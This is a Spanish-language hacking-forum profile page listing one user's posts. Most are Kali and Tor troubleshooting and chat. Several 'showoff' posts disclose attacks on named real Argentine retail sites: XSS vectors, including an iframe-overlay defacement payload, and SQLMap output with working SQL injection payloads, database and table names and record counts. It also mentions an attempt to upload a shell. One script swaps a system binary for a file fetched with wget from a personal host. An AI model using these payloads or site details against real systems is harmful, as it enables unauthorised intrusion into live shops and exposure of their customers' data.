Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Nobody

Páginas 1 ... 7 8 9 10
#161
Off Topic / Re:www.eagleinformatica.com.ar (Sigue mi búsqueda por una GTX).(Charla Gn0m3 & Nobody)
Febrero 24, 2016, 05:15:55 PM
En ese caso me voy a abstener de comprar ahí jaja

De todas formas no creo que le den mucha importancia a "su negocio", ya que en la página de Facebook no publican hace mucho, en la web no hay cambios y no noto actividad. En el panel admin tampoco hay cambios.
#162
Off Topic / Re:[Off] Critica a Windows 8!
Febrero 24, 2016, 01:11:53 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
A mi este hombre me parece un tremendo cuñado.

No sabe de lo que habla, pero aún así habla creyendo que no se equivoca.

Eso es lo más divertido jaja, cree que sabe de lo que habla y es tremenda burrada.
#163
Off Topic / [Off] Critica a Windows 8!
Febrero 24, 2016, 12:25:37 PM


Advertencia: Usted puede morir por risa excesiva.

No conozco a ese tal "July3p", pero el compañero que me pasó el vídeo dice que es uno de sus personajes (que desde ahora voy a llamar "pendulo humano" xD).

Saludos!
#164
Off Topic / Re:www.eagleinformatica.com.ar (Sigue mi búsqueda por una GTX).(Charla Gn0m3 & Nobody)
Febrero 24, 2016, 09:14:44 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo he comprado en persona en ese local.
Bueno haber quien me agrega esta compra No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos

Gn0m3

Rt Gn0m3 jaja.

Cuentanos tus experiencias con ese local, yo me fijé donde queda por el mapa, lo tengo a un ratito :P
¿Cómo te fue comprando ahí?
#165
Debates, Reviews y Opiniones / Re:Asistente Virtual Cortana-NO tolera acoso sexual ni insultos
Febrero 24, 2016, 08:45:39 AM
¿Quién está tan necesitado para acosar a Cortana? xD

No lo se, aguante Google Now (? jaja

Saludos!
#166
Batch - Bash / Re:[Bash] BeEF Fix.
Febrero 20, 2016, 05:35:28 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buen aporte bro C: ya veraas que a mas de uno le servira :3

¡Gracias bro!
Espero que así sea.

Saludos.
#167
Batch - Bash / [Bash] BeEF Fix.
Febrero 20, 2016, 05:06:42 PM
¡Hola Underc0ders!

Estaba intentando trabajar con BeEF, cuando recuerdo el molesto error que tiene sobre Kali, que al iniciarlo no aparece el admin ui y demás.

Según Offensive Security, este error fue parcheado en Kali Rolling, lo cual es una total mentira porque estoy trabajando (de hecho, publicando esto) desde Kali Rolling.

Tal vez sea un error que solo me afecta a mi o tal vez no, pero nunca está de más publicar un "parche" (y entre muuuuchas comillas, "parche") para solucionar esto.

Código: bash
#!/bin/sh
service beef-xss stop
sleep 1
echo '[*] Executing BeEF Framework...'
sleep 1
echo '[ INFO ] Default user/passwd: beef : beef'
echo "[ INFO ] If an error ocurrs, try using ' service beef-xss start ' in other console AFTER BeEF Framework loads."
cd /usr/share/beef-xss/
ruby beef


De más estar decir sobre ' chmod +x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta '...

Y para los vagos como yo, se puede solucionar editar el script que viene por defecto en Kali (/usr/bin/beef-xss/)

Código: bash
#!/bin/bash

if [[ $EUID -ne 0 ]]; then
   echo "[*] This script must be run as root" 1>&2
   exit 1
fi

port=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['http']['port']")
ui=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['http']['web_ui_basepath']")
hook_file=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['http']['hook_file']")
#user=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['credentials']['user']")
#passwd=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['credentials']['passwd']")

service beef-xss stop
echo '[*] Please wait as BeEF services are started.'
echo '[*] You might need to refresh your browser once it opens.'
echo "[*] UI URL: http://127.0.0.1:$port$ui/panel"
echo "[*] Hook: <script src=\"http://<IP>:$port$hook_file\"></script>"
echo "[*] Example: <script src=\"http://127.0.0.1:$port$hook_file\"></script>"
#echo "[*] Username: $user | Password: $passwd" #echo "[*] Default user/pass: beef : beef"
echo ''; echo "If an error ocurrs, try using 'service beef-xss start' AFTER BeEF loads."
echo "[*] To kill BeEF you can use 'killall ruby && service beef-xss stop' in console."; echo ''

cd /usr/share/beef-xss/
ruby beef #nohup ./beef >& /dev/null &


O simplemente ejecutando esta linea en consola...
Código: php
mv /usr/bin/beef-xss /usr/bin/beef-xss.bak && wget -O /usr/bin/beef-xss https://nobodytl.github.io/codes/bash/beef-xss && chmod +x /usr/bin/beef-xss


Espero que les sirva, ¡saludos!

P.D.: Gracias a @arthusu, que me sugirió que lo publicara :P
#168
Hacking / Re:v4Ddos
Febrero 12, 2016, 10:32:00 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ataque a la capa 7 del modelo TCP... Has reinventado el modelo? Jajajaja


Quiero conocer ese nuevo de 7 capas, se ve interesante xD

Además, básicamente sería DoS, no DDoS.
También cabe destacar que si uno cuenta, por ejemplo, con una conexión de 10mbps y el host a atacar es de 300mbps... Sería un poquito imposible saturarlo, ¿no? xD
#169
Dudas y pedidos generales / Re:Problema instalando TOR en kali linux 2.0
Febrero 10, 2016, 12:15:46 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Nada, me ocurre lo mismo. He probado a borrar el if completo y ahora cuando intento ejecutar el tor browser no se abre.

Hola nuevamente!

Lamento decirte que me estoy quedando sin posibles soluciones, lamento si no te fuí de mucha ayuda, pero todavía tengo un as bajo la manga (no tiene nada que ver que también me dedique a la magia jaja).

Si tienes la posibilidad, ¿podrías probar haciendo lo pasos que se te indicó desde un Live CD/USB? Es para descartar algunos problemas.

Si no dispones de un Live CD o un Live USB, podrías también crear un usuario desde consola con los comandos:

# useradd nombre_de_usuario (o adduser nombre_de_usuario).
# passwd nombre_de_usuario

Y luego ejecutar TOR desde ese usuario.

Nuevamente, lamento no poder darte más ayuda :/

¡Saludos!
#170
Dudas y pedidos generales / Re:Problema instalando TOR en kali linux 2.0
Febrero 09, 2016, 11:28:52 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola, lo acabo de intentar y me da el mismo error!

Hola, ¡muy buenas!

Intentá ejecutar esta serie de comandos y pasos.

# apt-get remove --purge tor
# apt-get clean

Luego de esto, descarga la versión de TOR que más te sea conveniente desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez descargado, descomprimilo y buscá el archivo que anteriormente mencioné (Browser/start-tor-browser), edita la linea correspondiente (o directamente borrá el if completamente, lo que más te agrade).

Dicho y hecho esto, ejecutá el "start-tor-browser.desktop", esto podrás hacerlo desde consola si te complace.

Comentanos como te fue :P

¡Saludos!
#171
Hacking ShowOff / Re:[XSS] www.eagleinformatica.com.ar (Sigue mi busqueda por una GTX).
Febrero 09, 2016, 11:01:17 AM
Para agregar un poco más de información al reporte de arthusu (aunque no haga falta, puesto a que su reporte es impecable), dejo un poco de información que saqué con SQLMap y un poco de información que agregué yo xD

Citar========================================= [ Information ] =========================================
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-9627 OR 5368=5368
    Vector: OR [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=3150 AND (SELECT * FROM (SELECT(SLEEP(5)))alTA)
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=3150 UNION ALL SELECT CONCAT(0x7171766271,0x5150785374516952454e58584c494f52464b6a66696c62736f724c77666b6a6f446d446a77647862,0x7162786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
--
web application technology: Apache 2.4.12, PHP 5.4.40
back-end DBMS: MySQL 5.0.12
banner:    '5.1.73-cll'
current user:    'eagleinf_usr@localhost'
current database:    'eagleinf_web'
hostname:    'c151.cloud.wiroos.net'
current user is DBA:    False
database management system users [1]:
  • 'eagleinf_usr'@'localhost'

    database management system users privileges:
  • 'eagleinf_usr'@'localhost' [1]:
        privilege: USAGE

    database management system users roles:
  • 'eagleinf_usr'@'localhost' [1]:
        role: USAGE

    Absolute Path: /home/eagleinf/public_html/

    Admin panel: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    CPanel: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (www.eagleinformatica.com.ar:2083)

    ========================================= [ Fingerprint ] =========================================
    web application technology: Apache 2.4.12, PHP 5.4.40
    back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
                   html error message fingerprint: MySQL

    ========================================= [ Databases ] =========================================
    available databases [2]:
  • eagleinf_web
  • information_schema

    ========================================= [ Database schemas ] =========================================
    Database: eagleinf_web
    [9 tables]
    +---------------+
    | cat           |
    | configuracion |
    | contacto      |
    | faq           |
    | pedidos       |
    | productos     |
    | registrados   |
    | sub           |
    | usuarios      |
    +---------------+

    ========================================= [ Database tables ] =========================================
    Database: eagleinf_web

    Table: usuarios [1 entry]
    Table: sub [60 entries]
    Table: faq [8 entries]
    Table: cat [23 entries]
    Table: registrados [4549 entries]
    Table: pedidos [3055 entries]
    Table: configuracion [9 entries]
    Table: productos [191 entries]
    Table: contacto [0 entries]
Tampoco logré subir una shell (@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, intentamos el mismo método me parece jaja).

Saludos.
#172
Dudas y pedidos generales / Re:Problema instalando TOR en kali linux 2.0
Febrero 08, 2016, 08:03:39 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Intento ejecutar el programa y me sale esto otro:

Ya he probado a seguir las indicaciones que se me dan y nada, hago click en reiniciar el navegador y vuelve a mostrar lo mismo  :-\                                                       

Hola nuevamente.

Por lo que veo estás ejecuando el TOR directamente desde el "Tor Browser Setup", esto vendría a ser "incorrecto". Una vez finalizada la edición del correspondiente archivo mencionado más arriba, TOR debe ser ejecutando desde el archivo ".desktop" (llámese acceso directo).

Saludos.
#173
Dudas y pedidos generales / Re:Problema instalando TOR en kali linux 2.0
Febrero 08, 2016, 09:16:16 AM
Hola, ¿cómo estás?

Te comento, el archivo que vos estás editando es, justamente un lanzador, lo que en "ventanas" llamaríamos acceso directo. Dentro de la carpeta "Browser" de TOR encontrarás otro "start-tor-browser" (o un nombre similar, sinceramente no lo recuerdo muy bien ahora y no ando en Linux para fijarme). Ahí podrás editar el archivo con nano, vi, gedit, etc. sin problemas :-).
La edición que propones para que el error sobre usuario root no se muestr está bien, sin embargo siempre es mejor no ignorar esas advertencias, ya que fueron hechas para algo.

Pero si aún sientes la necesidad de ejecutarlo bajo root (vamos, nadie crearía otro usuario para Tor únicamente jaja), puedes hacer esa edición sin problemas.

Comentanos como te fue :P

Saludos!
#174
Hacking ShowOff / Re:[XSS] www.eagleinformatica.com.ar (Sigue mi busqueda por una GTX).
Febrero 07, 2016, 08:55:07 PM
Esto si es una comunidad, se reporta un XSS y salta otro XSS, SQLi, otro XSS, un Blind XSS jaja

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buena, peeeero... alguien compra ahí de verdad? jajajaja

Saludos.

Espero que no jaja, no me pinta mucha confianza... Ya veo que pedís una GTX 990 y te traen una "JeFors GTEquis -990" xD

Con esa jefors los juegos se verán así:


Jaja, me mataste con tu imagen xD

Edito:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Además tiene listado de directorios: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Tendrá más? xD
#175
Hacking ShowOff / Re:[XSS] www.eagleinformatica.com.ar (Sigue mi busqueda por una GTX).
Febrero 07, 2016, 11:19:02 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buena, peeeero... alguien compra ahí de verdad? jajajaja

Saludos.

Espero que no jaja, no me pinta mucha confianza... Ya veo que pedís una GTX 990 y te traen una "JeFors GTEquis -990" xD
#176
Hacking / Re:[APP] Localizador de IPs
Febrero 05, 2016, 10:33:58 AM
Excelente Black, ya mismo lo pruebo jaja

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Para los desconfiados, detecciones: 1 / 54: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta cada uno decide si la ejecuta o no.

Un saludo.

Naaah, ¿desconfiados? Simplemente ejecutamos el programa en Sandboxie (xD), es broma.

¡Saludos!
#177
Hacking ShowOff / [XSS] www.eagleinformatica.com.ar (Sigue mi busqueda por una GTX).
Febrero 05, 2016, 10:11:32 AM
¡Buenas!

Sigue mi busqueda por una GTX, encontré una nueva página web que no me trae buena pinta (pero no soy nadie para juzgar), de todas formas aproveché mi ratito libre y me divertí un rato jaja.

(P.D.: Disculpen el tamaño de la imagen, esta la tomé desde mi notebook).
- Imagen:
Citar

- URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Vector utilizado: <script>prompt("Underc0de.org", "By Nobody");</script>
- Sectores vulnerables: Buscador.
- Reportado: NO.

¡Saludos!
#178
Hacking ShowOff / Re:[XSS] www.aikencomputacion.com.ar
Febrero 05, 2016, 09:29:28 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.
Gracias por avisar, voy a dejar de usar Google Drive como host jaja, imagen re subida.
¡Gracias!
(P.D.: Me daba error al modificar, una linda blank page :/ jaja).

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.
Si, ya se solucionó :-) Gracias por repararlo :P
Gracias, seguriás viendo aportes míos :P jaja

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud
Jaja, no se como llegué a esto (? xD
Jaja gracias, ¡saludos!
#179
Hacking ShowOff / [XSS] www.aikencomputacion.com.ar
Febrero 02, 2016, 07:43:08 PM
¡Hola, muy buenas!

Estaba buscando para comprarme una GeForce nueva, cuando me topé con mi viejo amigo Aiken Computación (Argentina :P), y como todo amante de la informática y vulnerabilidades a nivel web, sentí la obligación de probar un XSS en una variable GET (jaja).

Tuve la idea de incluir un script JavaScript externo para no líarme bypasseando el addslashes de la web.

(P.D.: Es una "fullscreen" iframe).
[*] Imagen:
Citar

[*] URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[*] Vector utilizado: <script src=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta></script>
[*] Variables vulnerables: Todos los GET de la web.
[*] Reportado: SI (no reparado).

En definitiva, el vector final sería: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El código del JavaScript lo dejo aquí debajo (aunque también es visible desde el link del vector) para demostrar como funciona.

Código: php
document.body.innerHTML = "<iframe style='position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;' src=http://www.underc0de.org/></iframe>";
alert("Underc0de.org");


¡Saludos!
#180
Dudas y pedidos generales / Re:Problema con Aircrack 1.2 RC2, ¿soy solo yo?
Agosto 17, 2015, 12:40:05 PM
¡Muchas gracias a ambos por las respuestas! De momento no estoy en mi casa con mi pendrive con Kali jaja, por la noche lo intentaré y compartiré los resultados.

Nuevamente, muchas gracias.

Edito: Sigo teniendo el mismo problema :/
Edit: Solucionado, gracias a ambos!

Saludos.
Páginas 1 ... 7 8 9 10